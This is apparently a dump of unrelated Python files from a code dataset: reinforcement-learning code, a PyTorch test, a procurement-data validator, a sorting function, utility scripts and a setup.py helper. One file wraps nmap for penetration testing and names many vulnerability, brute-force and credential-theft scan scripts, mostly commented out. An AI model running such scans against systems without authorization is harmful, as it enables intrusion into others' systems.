learning_rate = self.alpha/(np.sqrt(value + self.min_squ_grad))
deltaTheta = learning_rate * Gradients
self.average_learning_rate = np.mean(learning_rate)
elif self.alpha_method == 'Adam':
# Adam
try:
self.v, self.m
except AttributeError:
print('Initialise m, v')
self.v = np.zeros_like(Gradients)
self.m = np.zeros_like(Gradients)
self.m = self.momentum * self.m + (1-self.momentum) * Gradients
self.v = self.squ_grad_momentum * self.v + (1-self.squ_grad_momentum) * Gradients**2
learning_rate = self.alpha / (np.sqrt(self.v + self.min_squ_grad))
deltaTheta = learning_rate * self.m
self.average_learning_rate = np.mean(learning_rate)
else:
raise NameError('No alpha method name %s' % self.alpha_method)
return deltaTheta
def update_Theta(self):
print('\nLearning step: {0} || Memory size: {1}'.format(
self.learning_time, self.memory.shape[0]))
self.learning_time += self.batch_size
batch_T = self.sample_mini_batch(self.memory)
if self.n_jobs == -1:
core_num = cpu_count()
elif self.n_jobs <= 0 or self.n_jobs>cpu_count():
raise AttributeError('n_job wrong.')
else:
core_num = self.n_jobs
Thetas = self.Thetas
if core_num > 1:
# core_num > 1
batch_T_split = np.array_split(batch_T, core_num)
queue = Queue()
cost_queue = Queue()
max_action_value_queue = Queue()
processes = []
for core in range(core_num):
P = Process(target=self.process_do, args=(batch_T_split[core], Thetas, cost_queue, queue, max_action_value_queue))
processes.append(P)
P.start()
for i in range(core_num):
processes[i].join()
Gradients = queue.get()
cost = cost_queue.get()
max_action_value = [max_action_value_queue.get()]
for i in range(core_num-1):
Gradients = np.vstack((Gradients, queue.get()))
cost += cost_queue.get()
max_action_value.append(max_action_value_queue.get())
cost = cost/core_num
max_action_value = max(max_action_value)
Gradients = Gradients.sum(axis=0)
else:
# core_num = 1
Gradients, cost, max_action_value = self.process_do(batch_T, Thetas)
# record cost history
if self.learning_time % self.batch_size == 0:
self.cost_his.set_value(self.learning_time, cost)
self.max_action_value_his.set_value(self.learning_time, max_action_value)
# epsilon
if self.epsilon > 0.1:
self.epsilon = self.epsilon * self.epsilon_decay_rate
else:
self.epsilon = 0.1
deltaTheta = self.get_deltaTheta(Gradients)
# Gradient update
Thetas_layers = self.n_layers-1
Thetas_shapes = [self.Thetas[i].shape for i in range(Thetas_layers)]
for i, shape in enumerate(Thetas_shapes):
Thetas_backup = Thetas[i] + deltaTheta[:shape[0]*shape[1]].reshape(shape)
deltaTheta = deltaTheta[shape[0]*shape[1]:].copy()
if np.abs(Thetas_backup).max() > 20:
print('\n\n\n!!!!! Warning, Thetas overshooting, turn alpha down!!!\n\n\n')
else:
self.Thetas[i] = Thetas_backup
# Change fixed Theta
if self.swap_Theta_counting >= self.target_theta_update_frequency:
self.swap_Theta_counting += self.batch_size - self.target_theta_update_frequency
self.fixed_Thetas = self.Thetas.copy()
print("\n\n\n## Swap Thetas ##\n\n")
else:
self.swap_Theta_counting += self.batch_size
def forward_propagate(self, features, Thetas, for_bp=False):
"""
Input:
if for_bp = False:
features: shape(features num, actions num)
else:
features: shape(features num, samples num)
for_bp: calculate for back propagation
--------------------------
return:
A: shape(1, action num)
"""
A = features.copy()
if for_bp:
self.As_4_bp = []
self.Zs = [None]
for i in range(1, self.n_layers):
A = np.vstack((np.ones((1, A.shape[1])), A)) # [1, a1, a2, a3].T
if for_bp:
self.As_4_bp.append(A) # layer1 to n-1
# layer i + 1
Z = Thetas[i-1].dot(A)
A = self.calculate_AF(Z, i) # [a1, a2, a3].T
if for_bp:
self.Zs.append(Z)
return A
def calculate_AF(self, A, layer):
X = A.copy()
if layer < self.n_layers-1:
# nonlinear activation function
if self.activation_function == 'ReLU':
y = X.clip(0)
elif self.activation_function == 'SoftPlus':
y = np.log(1+np.exp(X))
else:
raise NameError(self.activation_function, ' is not in the name list')
else:
# linear activation function
y = X
return y
def get_gradients_back_propagate(self, all_y, all_A, Thetas):
last_layer = self.n_layers-1
gradients = np.array([])
for i in range(last_layer, 0, -1):
# ignore +1 in every A's beginning
if i == last_layer:
all_error = (all_y - all_A).T # all_error: shape(n_actions, n_samples)
else:
all_error = (Thetas[i].T.dot(all_delta))[1:]
all_delta = all_error * self.calculate_AFD(self.Zs[i].copy(), layer=i)
if self.lambda_reg is not None:
# regularization term:
regularization = self.lambda_reg*Thetas[i-1]
regularization[:, 0] = 0
# errors: shape(n_hidden_units, last_n_hidden_units)
gradients_for_current_layer = np.dot(all_delta, self.As_4_bp[i-1].T) + regularization
else:
# errors: shape(n_hidden_units, last_n_hidden_units)
gradients_for_current_layer = np.dot(all_delta, self.As_4_bp[i-1].T)
gradients = np.append(gradients_for_current_layer, gradients)
Gradients = gradients/self.batch_size
return Gradients
def calculate_AFD(self, A, layer):
X = A.copy()
if layer < self.n_layers-1:
if self.activation_function == 'ReLU':
np.place(X, np.array(X > 0), 1)
d = X.clip(0)
elif self.activation_function == 'SoftPlus':
d = 1/(1 + np.exp(-X))
else:
raise NameError(self.activation_function, ' is not in the name list')
else:
d = np.ones_like(X)
return d
def sample_mini_batch(self, memory):
"""
Batch consist recent and old transitions.
The default is 10% recent and 90% old transitions.
Parameters
----------
memory: all transitions that in the memory.
Returns
-------
sampled batch
"""
if memory.shape[0] < self.batch_size:
batch_size = memory.shape[0]
else:
batch_size = self.batch_size
rec_his_size = int(batch_size*self.rec_his_rate)
old_his_size = batch_size - rec_his_size
rec_index = np.random.choice(memory.index[-batch_size:], rec_his_size, replace=False)
old_index = np.random.choice(memory.index[:-batch_size], old_his_size, replace=False)
index = np.concatenate((rec_index, old_index))
np.random.shuffle(index)
batch = memory.ix[index, :] # this is an array
return batch
def update_environment(self, state, action_label, env):
action = self.actions[action_label]
env.update_environment(state, action)
def get_single_action_features(self, env, state, action_label):
"""
return:
features: np.array, shape(feature num, 1)
"""
action = self.actions[action_label]
features = env.get_features(state, actions_array=np.array([[action]])) # np.array([[1,2,3,4]]).T shape=(n,1)
return features
def get_all_actions_features(self, env, next_state):
"""
return:
all_features: pd.DataFrame, shape(feature num, action num)
"""
# np.array([[1,2,3,4]]).T shape=(n,1)
F_As = env.get_features(next_state, actions_array=self.actions.values[np.newaxis, :])
all_features = pd.DataFrame(F_As, columns=self.actions.index)
return all_features
def get_Q(self, features, Thetas):
"""
Parameters
----------
features
shape(feature num, sample num)
Returns
-------
all_Q:
shape(sample num, 1)
"""
all_Q = self.forward_propagate(features, Thetas, for_bp=True).T
return all_Q
def get_next_Q_max(self, all_next_S_As_features):
"""
Parameters
----------
all_next_S_As_features:
shape(sample num, (features num, all_actions) )
Returns
-------
all_next_Q_max:
shape(sample num, 1)
"""
all_next_Q_max = np.empty((0,1))
for next_S_As_features in all_next_S_As_features:
# next_S_As_features: shape(features num, all_actions)
Q_max = self.forward_propagate(next_S_As_features, self.fixed_Thetas, for_bp=False).max()
all_next_Q_max = np.append(all_next_Q_max, Q_max)
all_next_Q_max = all_next_Q_max[:, np.newaxis]
return all_next_Q_max
def get_all_q_and_all_features(self, env, state):
"""
Given state and env
for a in all_action(S): # current state S
X_A[a] = [x0, x1, x2...].T
q_cap[a] = F_A[a].T * W
"""
# F = np matrix = axis0: features value, axis1: actions
F = env.get_features(state, actions_array=self.actions.values[np.newaxis, :])
# all_features = pd.DataFrame, axis0: feature value, axis1: actions
all_features = pd.DataFrame(F, columns=self.actions.index)
try:
# all_q: pd.Series q for all actions
all_q = pd.Series(self.forward_propagate(all_features, self.Thetas).ravel(), index=self.actions.index)
except TypeError:
# create fixed Theta and Theta, random initial theta, shape(n_hidden_units, features)
if self.n_hidden_units == None:
self.n_hidden_units = 2*(F.shape[0]+1)
self.fixed_Thetas = []
# nonlinear activation function
self.fixed_Thetas.append(np.random.random((self.n_hidden_units, F.shape[0]+1)) * (2*0.1) - 0.1)
if self.n_layers > 3:
# nonlinear activation function
for i in range(self.n_layers-3):
self.fixed_Thetas.append(
np.random.random((self.n_hidden_units, self.n_hidden_units+1)) * (2*0.1) - 0.1)
# linear activation function
self.fixed_Thetas.append(np.random.random((1, self.n_hidden_units+1)) * (2*0.1) - 0.1)
self.Thetas = self.fixed_Thetas.copy()
all_q = pd.Series(self.forward_propagate(all_features, self.Thetas).ravel(), index=self.actions.index)
return [all_q, all_features]
def choose_action(self, all_q):
"""
Choose action A = argmax_a(q_cap) with probability 1-epsilon, else a random action.
"""
if np.random.random() <= 1 - self.epsilon:
# choose optimal action
all_q = all_q.reindex(np.random.permutation(all_q.index))
action_label = all_q.argmax(skipna=False)
else:
# random choose action
action_label = np.random.choice(self.actions.index)
return action_label
def get_optimal_action(self, all_features):
"""
This is for applying this trained model
Parameters
----------
all_features: all features, not include 1 (bias term)
Returns
-------
The optimal action
"""
all_Features = pd.DataFrame(all_features, columns=self.actions.index)
# all_q: pd.Series q for all actions
all_q = pd.Series(self.forward_propagate(all_Features, self.Thetas).ravel(), index=self.actions.index)
all_q = all_q.reindex(np.random.permutation(all_q.index))
action_label = all_q.argmax(skipna=False)
action = self.actions[action_label]
return action
def get_config(self):
all_configs = pd.Series({'Thetas': self.Thetas, 'fixed_Thetas': self.fixed_Thetas, 'learning_time': self.learning_time,
'alpha': self.alpha, 'memory': self.memory, 'epsilon': self.epsilon, 'actions': self.actions,
})
return all_configs
def set_config(self, config):
self.Thetas, self.fixed_Thetas, self.learning_time, self.alpha, self.memory, self.epsilon, self.actions, \
= config['Thetas'], config['fixed_Thetas'], config['learning_time'], config['alpha'], \
config['memory'], config['epsilon'], config['actions'] | StarcoderdataPython |
8130453 | from __future__ import absolute_import, division, print_function, unicode_literals
import torch
from tests import utils
class SimpleUnsqueezeModel(torch.nn.Module):
def __init__(self, dimension, inplace=False):
super(SimpleUnsqueezeModel, self).__init__()
self.dimension = dimension
self.inplace = inplace
def forward(self, tensor):
if self.inplace:
other = tensor + tensor
return other.unsqueeze_(self.dimension)
else:
return torch.unsqueeze(tensor + tensor, self.dimension)
class TestUnsqueeze(utils.TorchGlowTestCase):
@utils.deterministic_expand(
[
lambda: ("dim0", SimpleUnsqueezeModel(0), torch.randn(2, 3, 4)),
lambda: ("dim1", SimpleUnsqueezeModel(1), torch.randn(2, 3, 4)),
lambda: ("dim2", SimpleUnsqueezeModel(2), torch.randn(2, 3, 4)),
lambda: ("dim3", SimpleUnsqueezeModel(3), torch.randn(2, 3, 4)),
lambda: ("dim_negative", SimpleUnsqueezeModel(-1), torch.randn(2, 3, 4)),
lambda: (
"inplace",
SimpleUnsqueezeModel(-1, inplace=True),
torch.randn(2, 3, 4),
),
]
)
def test_unsqueeze(self, _, module, tensor):
utils.compare_tracing_methods(module, tensor, fusible_ops=["aten::unsqueeze"])
| StarcoderdataPython |
11362544 | <gh_stars>0
import os
import re
import pandas as pd
from extractor import extract
from voluptuous import (Schema, Required, All, Optional, Length, Any,
MultipleInvalid, Match, Coerce)
# Lookups
iso_country = pd.read_csv('./Lookups/ISO_COUNTRY.csv', dtype='str',
encoding='latin', keep_default_na=False)
cpv = pd.read_csv('./Lookups/CPV.csv', dtype='str')
ma = pd.read_csv('./Lookups/MA_MAIN_ACTIVITY.csv', dtype='str')
td = pd.read_csv('./Lookups/TD_DOCUMENT_TYPE.csv', dtype='str')
nc = pd.read_csv('./Lookups/NC_CONTRACT_NATURE.csv', dtype='str')
aa = pd.read_csv('./Lookups/AA_AUTHORITY_TYPE.csv', dtype='str')
pr = pd.read_csv('./Lookups/PR_PROC.csv', dtype='str')
ty = pd.read_csv('./Lookups/TY_TYPE_BID.csv', dtype='str')
ac = pd.read_csv('./Lookups/AC_AWARD_CRIT.csv', dtype='str')
rp = pd.read_csv('./Lookups/RP_REGULATION.csv', dtype='str')
# Allowed Currencies
currencies = ['EUR', 'BGN', 'CHF', 'USD', 'HRK', 'CZK', 'DKK', 'HUF', 'SEK',
'NOK', 'LTL', 'TRY', 'PLN', 'MKD', 'RON', 'JPY', 'ISK', 'SKK',
'LVL', 'GBP', 'MTL', 'CYP', 'EEK']
def number(s):
n = re.sub(r'\s', '', s.replace(',', '.').replace('%', ''))
return float(n)
def concatenate(lst):
return ' '.join(lst)
def flat(lst):
return lst[0]
# Sub Schemas
value = Schema({
Optional('CURRENCY'): All(str, Any(*currencies)),
Optional(str): Any([], All(Coerce(flat), Coerce(number)),
All(Coerce(flat), str)) # Let it pass
})
contract_value = Schema({
Optional(str): value,
Optional('NUMBER_OF_YEARS'): Any([], All(Coerce(flat), Coerce(number)),
All(Coerce(flat), str)), # Let it pass
Optional('NUMBER_OF_MONTHS'): Any([], All(Coerce(flat), Coerce(number)),
All(Coerce(flat), str)) # Let it pass
})
contractor = Schema({
Optional(str): Any([], All(Coerce(flat), str)),
Optional('COUNTRY'): Any([], All(Coerce(flat), str, Length(2),
Any(*iso_country.Code)))
})
match_nuts = Match('^(' + '|'.join(iso_country.Code) + ')')
match_cpv = Match('^(' + '|'.join(cpv.CODE) + ')')
# Document Schema
schema = Schema({
Required('DOC_ID'): str,
Required('CODED_DATA'): {
Required('NOTICE_DATA'): {
Required('NO_DOC_OJS'): All(Coerce(flat), str),
Required('ORIGINAL_NUTS'): [All(str, match_nuts)],
Required('ORIGINAL_CPV'): [All(str, match_cpv)],
Required('ISO_COUNTRY'): All(Coerce(flat), str, Length(2),
Any(*iso_country.Code)),
Required('IA_URL_GENERAL'): Any([], All(Coerce(flat), str)),
Required('REF_NOTICE'): [str],
Required('VALUES_LIST'): {
Optional('GLOBAL_VALUE'): value,
Optional('CONTRACTS_VALUE'): [value]
}
},
Required('CODIF_DATA'): {
Required('DS_DATE_DISPATCH'): All(Coerce(flat), str),
Required('TD_DOCUMENT_TYPE'): All(Coerce(flat), str,
Any(*td.CODE)),
Required('AA_AUTHORITY_TYPE'): All(Coerce(flat), str,
Any(*aa.CODE)),
Required('NC_CONTRACT_NATURE'): All(Coerce(flat), str,
Any(*nc.CODE)),
Required('PR_PROC'): All(Coerce(flat), str, Any(*pr.CODE)),
Required('RP_REGULATION'): All(Coerce(flat), str, Any(*rp.CODE)),
Required('TY_TYPE_BID'): All(Coerce(flat), str, Any(*ty.CODE)),
Required('AC_AWARD_CRIT'): All(Coerce(flat), str, Any(*ac.CODE)),
Required('MA_MAIN_ACTIVITIES'): [All(str, Any(*ma.CODE))]
}
},
Required('CONTRACT'): {
Required('OTH_NOT'): All(Coerce(flat), str, Any('YES', 'NO')),
Optional('CONTRACTING_AUTHORITY'): All(Coerce(flat), str),
Optional('CONTRACT_OBJECT'): {
Optional('NUTS'): [All(str, match_nuts)],
Optional('NUTS_EXTRA'): All(Coerce(concatenate), str),
Optional('CPV_MAIN'): Any([], All(Coerce(flat), str, match_cpv)),
Optional('CONTRACT_VALUE'): contract_value,
Optional(str): Any([], All(Coerce(flat), str, Any('YES', 'NO'))),
},
Optional('AWARDS_OF_CONTRACT'): [{
Optional('CONTRACTOR'): contractor,
Optional('CONTRACT_VALUE'): contract_value,
}]
}
})
def prune(node):
if isinstance(node, list):
for n in node:
prune(n)
elif isinstance(node, dict):
for k in list(node.keys()):
if node[k]:
prune(node[k])
else:
del node[k]
if __name__ == "__main__":
Y = '2013'
M = '01'
years = ['2013', '2014', '2015', '2016']
months = ['01', '02', '03', '04', '05', '06', '07', '08',
'09', '10', '11', '12']
collection = []
for Y in years:
print(Y)
for M in months:
print(M)
# Folder containing xml files
DIR = os.path.join('/Volumes/WD/S8', Y + '-' + M)
# List xml files
files = os.listdir(DIR)
for f in files:
# Extract data from xml file
file_path = os.path.join(DIR, f)
data = extract(file_path)
try:
data = schema(data)
except MultipleInvalid as e:
print(str(e) + ' ---- file: ' + file_path)
prune(data)
collection.append(data)
print(collection)
break
| StarcoderdataPython |
52506 | <reponame>MichaelWiciak/SortingAlgorithms
def insertionSort(aList):
first = 0
last = len(aList)-1
for CurrentPointer in range(first+1, last+1):
CurrentValue = aList[CurrentPointer]
Pointer = CurrentPointer - 1
while aList[Pointer] > CurrentValue and Pointer >= 0:
aList[Pointer+1] = aList[Pointer]
Pointer -= 1
aList[Pointer+1] = CurrentValue
| StarcoderdataPython |
1619678 | <reponame>jcnelson/syndicate<gh_stars>10-100
#!/usr/bin/python
import socket
import time
import sys
import urllib2
import base64
auth = "<PASSWORD>:<PASSWORD>"
hostname = sys.argv[1]
port = int(sys.argv[2] )
filename = sys.argv[3]
data = sys.argv[4]
offset = 0
if len(sys.argv) > 5:
offset = int(sys.argv[5])
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( (hostname, port) )
http_m = ""
http_m += "POST %s HTTP/1.0\r\n" % filename
http_m += "Host: t510\r\n"
http_m += "Authorization: Basic %s\r\n" % base64.b64encode(auth)
http_m += "Content-Length: %s\r\n" % len(data)
http_m += "Content-Type: application/octet-stream\r\n"
http_m += "Content-Range: bytes=%s-%s\r\n" % (offset, offset + len(data) - 1)
http_m += "\r\n";
http_m += data
print "<<<<<<<<<<<<<<<<<<<<<<<<<"
print http_m
print "<<<<<<<<<<<<<<<<<<<<<<<<<\n"
s.send( http_m )
ret = s.recv(16384)
print ">>>>>>>>>>>>>>>>>>>>>>>>>"
print ret
print ">>>>>>>>>>>>>>>>>>>>>>>>>\n"
s.close()
| StarcoderdataPython |
1652482 | <reponame>sheepy0125/hisock
# import pytest
# from server import start_server
# from client import connect
# from utils import get_local_ip
| StarcoderdataPython |
9783126 | <reponame>Arusey/Porfolio-website<gh_stars>0
# Generated by Django 3.1.6 on 2021-02-21 07:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portfolio', '0003_auto_20210221_0617'),
]
operations = [
migrations.AddField(
model_name='project',
name='category_style',
field=models.CharField(blank=True, max_length=50, null=True),
),
]
| StarcoderdataPython |
7337 | <gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Module Name
Description...
"""
__author__ = "<NAME>"
__copyright__ = "Copyright 2021, <NAME>"
__credits__ = ["<NAME>","etc."]
__date__ = "2021/04/12"
__license__ = "GPL"
__version__ = "1.0.0"
__pythonversion__ = "3.9.1"
__maintainer__ = "<NAME>"
__contact__ = "<EMAIL>"
__status__ = "Development"
import sys, os
import logging
import inspect
import datetime
STD_LOG_FORMAT = ("%(asctime)s - %(levelname)s - %(name)s - %(filename)s - %(funcName)s() - ln.%(lineno)d"
" - %(message)s")
def file_logger(filename: str,
level:int = logging.DEBUG,
format: str = STD_LOG_FORMAT):
logger = logging.getLogger(__name__)
logger.setLevel(level)
formatter = logging.Formatter(format)
file_handler = logging.FileHandler(filename)
file_handler.setLevel(level)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
def prompt_logger(error):
caller = inspect.getframeinfo(inspect.stack()[1][0])
error_log = {"error_type": error.__class__.__name__,
"error_info": error.__doc__,
"error_line": error.__traceback__.tb_lineno,
"error_file": os.path.basename(caller.filename),
"error_time": datetime.datetime.now(),
"error_details": str(error).capitalize()}
print("----- ERROR -----")
print("Type:",error_log["error_type"])
print("Info:",error_log["error_info"])
print("Line:",error_log["error_line"])
print("File:",error_log["error_file"])
print("Time:",error_log["error_time"])
print("Details:",error_log["error_details"])
return error_log
def error_box():
pass
def sql_logger():
pass
if __name__ == "__main__":
pass | StarcoderdataPython |
11390394 | <reponame>Andrei486/class_export<gh_stars>0
import logging
LOG_FILE = "course_export.log"
logging.basicConfig(filename=LOG_FILE, level=logging.INFO) | StarcoderdataPython |
5019400 | <reponame>dladowitz/bitcoincorps
import sqlite3
import time
import pytest
import handing_threads
from ibd.four.crawler import *
from ibd.three.complete import Address
@pytest.fixture(scope="function")
def db(tmpdir):
# FIXME do this in-memory
import os
f = os.path.join(tmpdir.strpath, "test.db")
conn = sqlite3.connect(f)
create_tables(conn)
yield conn
conn.close()
def test_fixture(db):
addresses = db.execute("select * from addresses").fetchall()
assert len(addresses) == 0
_addresses = [
Address(None, "8.8.8.8", 8333, None),
Address(None, "6.6.6.6", 8333, None),
Address(None, "4.4.4.4", 8333, None),
]
insert_addresses(_addresses, db)
addresses = db.execute("select * from addresses").fetchall()
assert len(addresses) == 3
na = next_addresses(db)
assert len(na) == 3
# completed task
address = _addresses[1]
address.id = 1
connection = Connection(address=address, worker="worker-1")
connection.start = time.time() - 5
connection.stop = time.time() - 1
connection.error = None
connection.version_message = b"version"
connection.addr_message = b"addr"
save_connection(connection, db)
addresses = db.execute("select * from connections").fetchall()
assert len(addresses) == 1
addresses = db.execute("select * from version_messages").fetchall()
assert len(addresses) == 1
addresses = db.execute("select * from addr_messages").fetchall()
assert len(addresses) == 1
assert len(next_addresses(db)) == 2 # one address has been seized
# # queued task
# connection = Connection(address=_addresses[1], worker="worker-2")
# save_connection(connection, db)
# assert len(next_addresses(db)) == 1
print(db.execute("select address_id from connections").fetchall())
print(db.execute("select id from addresses").fetchall())
print(
db.execute(
"select * from addresses where addresses.id not in (select address_id from connections)"
).fetchall()
)
| StarcoderdataPython |
6548074 | <reponame>fxavier/echosys
from rest_framework import serializers
from openmrs_viamo.models import Visit
class VisitSerializer(serializers.ModelSerializer):
class Meta:
model = Visit
fields = (
'id',
'type_visit',
'province',
'district',
'health_facility',
'patient_id',
'patient_identifier',
'age',
'gender',
'phone_number',
'appointment_date',
'next_appointment_date',
'community',
'pregnant',
'brestfeeding',
'tb'
)
read_only_fields = ('id',) | StarcoderdataPython |
3497380 | #
# Automated Dynamic Application Penetration Testing (ADAPT)
#
# Copyright (C) 2018 Applied Visions - http://securedecisions.com
#
# Written by <NAME> - http://www.siegetechnologies.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import nmap
from pprint import pprint
def translate_url(url):
if(url.startswith("https://")):
url = url[8:]
elif(url.startswith("http://")):
url = url[7:]
url_parts = url.split("/")
if(url_parts[0].startswith("www.")):
url = url_parts[0][4:]
else:
url = url_parts[0]
return url
def find(data):
try:
for k,v in data.items():
if(k == "script"):
yield v
elif(isinstance(v, dict)):
for result in find(v):
yield result
elif(isinstance(v, list)):
for d in v:
for result in find(d):
yield result
except AttributeError:
yield data
class nmap_scripting():
def __init__(self, target, ports, scripts_to_run=None):
if(ports != None):
self.port_values = "-p"+",".join(ports.split())
else:
self.port_values = ""
self.target = translate_url(target)
self.nm = nmap.PortScanner()
self.__valid_scripts = []
if(scripts_to_run is None):
# for current project goals only one script is run
# The idea beaing that any future development or tests can
# just call an nmap script and use its information
self.__valid_scripts = [
#"ssl-cert", # getthe target's ssl certificate
#"ssl-ccs-injection", # determines if vulnerable to ccs injection (CVE-2014-0224)
#"ssl-cert-intaddr", # reports any private ipv4 addrs in the ssl certificate
#"ssl-dh-params", # Weak Diffe-Hellman handshake detection
#"ssl-enum-ciphers", # Tries multiple ssl/tsl ciphers and ranks available
#"ssl-heartbleed", # detects if app is vuln to heartbleed
#"ssl-known-key", # checks to see if certificate has any known bad keys
#"ssl-poodle", # checks if app is vuln to poodle
#"sslv2-drown", # checks if app supports sslv2 and is vuln to drown
#"sslv2", # checks if it supports older and outdated sslv2
#"http-vuln-cve2006-3392", # checks for directory information given by Webmin
#"http-vuln-cve2009-3960", # adobe XML external entity injection
#"http-vuln-cve2010-0738", # checks if Jboss target is vuln to jmx console auth bypass
#"http-vuln-cve2010-2861", # Directory draversal agains ColdFusion server
#"http-vuln-cve2011-3192", # Detects DoS vuln on Apache systems
#"http-vuln-cve2011-3368", # Checks Reverse Proxy Bypass on Apache
#"http-vuln-cve2012-1823", # Checks for PHP-CGI vulns
#"http-vuln-cve2013-0156", # Checks for Ruby object injections
#"http-vuln-cve2013-6786", # Redirection and XXS
#"http-vuln-cve2013-7091", # Zero data for local file retrieval
#"http-vuln-cve2014-2126", # Cisco ASA privilege escalation vuln
#"http-vuln-cve2014-2127", # Cisco ASA privilege escalation vuln
#"http-vuln-cve2014-2128", # Cisco ASA privilege escalation vuln
#"http-vuln-cve2014-2129", # Cisco ASA privilege escalation vuln
#"http-vuln-cve2014-3704", # SQL Injecection for Drupal
#"http-vuln-cve2014-8877", # Remote code injection for Wordpress
#"http-vuln-cve2015-1427", # Remote code execution via API exploitation
#"http-vuln-cve2015-1635", # Remote code execution on Microsoft systems
#"http-vuln-cve2017-1001000", # Privilege escalation on Wordpress
#"http-vuln-cve2017-5638", # Remote code execution for Apache Struts
#"http-vuln-cve2017-5689", # Pivilege escaltion for Intel Active management
#"http-vuln-cve2017-8917", # SQL injection for Joomla
#"http-vuln-misfortune-cookie", # RomPager Cookie vuln
#"http-vuln-wnr1000-creds", # Admin creds steal from WMR 1000 series
#"http-adobe-coldfusion-apsa1301", # Auth bypass via adobe coldfusion
#"http-affiliate-id", # grabs affiliate network information
#"http-apache-negotiation", # enables mod_negociation,allows potential spidering
#"http-apache-server-status", # attempts to retrieve apache server information
#"http-aspnet-debug", # determines if service enabled aspnet debug mode
#"http-auth", # get authentication scheme
#"http-auth-finder", # spiders for getting http based auth
#"http-awstatstotals-exec", # remote code execution in Awstats total
#"http-axis2-dir-traversal", # directory traversal in for apache axis2
#"http-backup-finder", # spidering attempt to discover duplicates/backup files
#"http-brute", # basic brute force http auth attack
#"http-chrono", # times page's responsivness
#"http-cisco-anyconnect", # connects as cisco AnyClient and retrieves basic information
#"http-coldfusion-subzero", # admin creds steal vial coldfusion vuln
#"http-comments-displayer", # displays comments from pages
#"http-config-backup", # searches for duplicates of system/server setup files
#"http-cors", # tests for cross-origin resource sharing
#"http-cross-domain-policy", # checks cross domain policy to expose overly permissive forms
#"http-csrf", # detects csrf forgeries
#"http-default-accounts", # tests for default accounts that may exist
#"http-dlink-backdoor", # checks for a firmware vuln on some dlink routers
#"http-dombased-xss", # uses the dom to leverage javascript
#"http-domino-enum-passwords", # tries to use the hashed Domino passwords
#"http-feed", # tries to get any rss information that may be present
#"http-form-brute", # brute forces http form based authentication
#"http-generator", # display's contents of generator metatab
#"http-headers", # tries to get a head request for "/"
#"http-joomla-brute", # brute force attack against joomla web CMS installations
#"http-malware-host", # signature search for known compromises
#"http-proxy-brute",
#"http-sql-injection",
"http-methods" # gets available methods from service (we only care about this for now)
]
else:
for i in scripts_to_run:
self.__valid_scripts.append(i)
def run(self):
results = self.nm.scan(self.target, arguments=self.port_values+" --script "+" --script ".join(self.__valid_scripts))
return list(find(results))
| StarcoderdataPython |
8027243 | #!/usr/bin/env python
def pgeplt(rc):
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui, QtCore
rc.loadenergies()
bd=pg.mkPen(width=2,color=(200, 200, 255), style=QtCore.Qt.DotLine)
plotWidget = pg.plot(title="Change in energies for "+rc.dirname,labels={'left':'dE','bottom':'twci'})
plotWidget.addLegend()
plotWidget.plot(rc.t,rc.eges-rc.eges[0], pen=bd, name='dE_{tot}')
plotWidget.plot(rc.t,rc.eb -rc.eb[0] , pen=20, name='dE_{b} ')
plotWidget.plot(rc.t,rc.eip -rc.eip[0] , pen=30, name='dE_{ip} ')
plotWidget.plot(rc.t,rc.eep -rc.eep[0] , pen=40, name='dE_{ep} ')
plotWidget.plot(rc.t,rc.eif -rc.eif[0] , pen=50, name='dE_{if} ')
plotWidget.plot(rc.t,rc.eef -rc.eef[0] , pen=60, name='dE_{ef} ')
plotWidget.plot(rc.t,rc.ee -rc.ee[0] , pen=70, name='dE_{ee} ')
QtGui.QApplication.instance().exec_()
if __name__=="__main__":
from TurbAn.Utilities.subs import create_object
rc=create_object()
pgeplt(rc)
| StarcoderdataPython |
6648908 | <filename>b_cfn_elasticsearch_index_test/testing_infrastructure.py<gh_stars>0
from aws_cdk.core import Stack
from aws_cdk.aws_elasticsearch import Domain, ElasticsearchVersion, CapacityConfig, ZoneAwarenessConfig, EbsOptions
from aws_cdk.aws_ec2 import EbsDeviceVolumeType
from b_cfn_elasticsearch_index.resource import ElasticsearchIndexResource
class TestingInfrastructure(Stack):
def __init__(self, scope: Stack):
super().__init__(
scope=scope,
id=f'TestingStack',
stack_name=f'TestingStack'
)
domain = Domain(
scope=self,
id="TestingElasticsearchDomain",
version=ElasticsearchVersion.V7_7,
capacity=CapacityConfig(
# Use the cheapest instance available.
data_node_instance_type="t3.small.elasticsearch",
data_nodes=1,
master_nodes=None,
),
zone_awareness=ZoneAwarenessConfig(enabled=False),
ebs=EbsOptions(enabled=True, volume_size=10, volume_type=EbsDeviceVolumeType.GP2),
)
ElasticsearchIndexResource(
scope=self,
name="TestingElasticsearchIndex",
elasticsearch_domain=domain,
index_prefix="testing_index",
)
| StarcoderdataPython |
67283 | # -*- coding: utf-8 -*-
# This file is distributed under the same License of Python
# Copyright (c) 2014 <NAME> <<EMAIL>>
"""
build_manpage.py
Add a `build_manpage` command to your setup.py.
To use this Command class import the class to your setup.py,
and add a command to call this class::
from build_manpage import BuildManPage
...
...
setup(
...
...
cmdclass={
'build_manpage': BuildManPage,
)
You can then use the following setup command to produce a man page::
$ python setup.py build_manpage --output=prog.1 \
--parser=yourmodule:argparser
Alternatively, set the variable AUTO_BUILD to True, and just invoke::
$ python setup.py build
If automatically want to build the man page every time you invoke your build,
add to your ```setup.cfg``` the following::
[build_manpage]
output = <appname>.1
parser = <path_to_your_parser>
"""
import datetime
from distutils.core import Command
from distutils.errors import DistutilsOptionError
from distutils.command.build import build
import argparse
AUTO_BUILD = True
class BuildManPage(Command):
description = 'Generate man page from an ArgumentParser instance.'
user_options = [
('output=', 'O', 'output file'),
('parser=', None, 'module path to an ArgumentParser instance'
'(e.g. mymod:func, where func is a method or function which return'
'an arparse.ArgumentParser instance.'),
]
def initialize_options(self):
self.output = None
self.parser = None
def finalize_options(self):
if self.output is None:
raise DistutilsOptionError('\'output\' option is required')
if self.parser is None:
